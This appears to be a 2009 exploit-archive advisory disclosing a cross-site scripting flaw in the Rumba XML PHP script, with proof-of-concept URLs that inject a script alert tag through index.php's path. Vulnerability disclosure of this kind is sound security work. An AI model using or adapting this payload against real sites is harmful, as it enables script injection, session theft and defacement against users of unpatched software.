[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Rumba XML suffers from a cross site scripting vulnerability
# Published : 2009-12-17
# Author : Hadi Kiamarsi
# Previous Title : PHPOPENCHAT 3.0.2 Cross Site Scripting AND/OR FPD
# Next Title : Explorer V7.20 Cross Site Scripting Vulnerability
###########################################
#
# Script Name : Rumba XML ( All Version )
#
# Bug Type : XSS vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://download.softpedia.ro/dl/4bf8d3951ea08865afb7c98b8c0476fa/4b2a1ca9/600056463/webscripts/PHP/xml18eng.zip
#
###########################################
PoC :
http://[target]/[path]/index.php/>"><script>alert('Hadi Kiamarsi')</script>
example :
http://server/index.php/>"><script>alert('Hadi Kiamarsi')</script>
local Example :
http://localhost/index.php/>"><script>alert('Hadi Kiamarsi')</script>